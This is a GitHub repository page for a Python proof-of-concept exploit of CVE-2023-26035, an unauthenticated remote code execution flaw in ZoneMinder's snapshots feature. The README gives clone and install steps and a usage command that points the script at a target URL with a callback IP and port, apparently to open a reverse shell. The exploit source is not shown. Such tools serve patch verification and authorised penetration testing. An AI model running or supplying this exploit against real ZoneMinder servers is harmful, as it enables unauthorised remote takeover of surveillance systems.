Skip to content

This is a script written in Python that allows the exploitation of the Zoneminder's security flaw described in CVE-2023-26035.

License

Notifications You must be signed in to change notification settings

m3m0o/zoneminder-snapshots-rce-poc

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

17 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Zoneminder Unauthenticated RCE via Snapshots (CVE-2023-26035) POC

This is a script written in Python that allows the exploitation of the Zoneminder's security flaw described in CVE-2023-26035. The system is vulnerable in versions preceding 1.36.33 and 1.37.33.

Usage

Clone the repository to your machine and install the dependencies using pip (it is recommended to use virtualenv to create an environment to separate these installations from global installations)

git clone https://github.com/m3m0o/zoneminder-snapshots-rce-poc
cd zoneminder-snapshots-rce-poc
pip install -r requirements.txt

The script needs the target URL with the Zoneminder's root path (like http://example.com/zm, http://example.com or http://example.com/zoneminder), the IP or domain for the target machine to connect and the port for the target machine to connect. Here's an example:

python3 main.py -u http://zoneminder.target:8000 -i 10.10.14.56 -p 443

script-demo

References

Unauthenticated RCE in snapshots

Rapid7 Vulnerability & Exploit Database ZoneMinder Snapshots Command Injection

About

This is a script written in Python that allows the exploitation of the Zoneminder's security flaw described in CVE-2023-26035.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages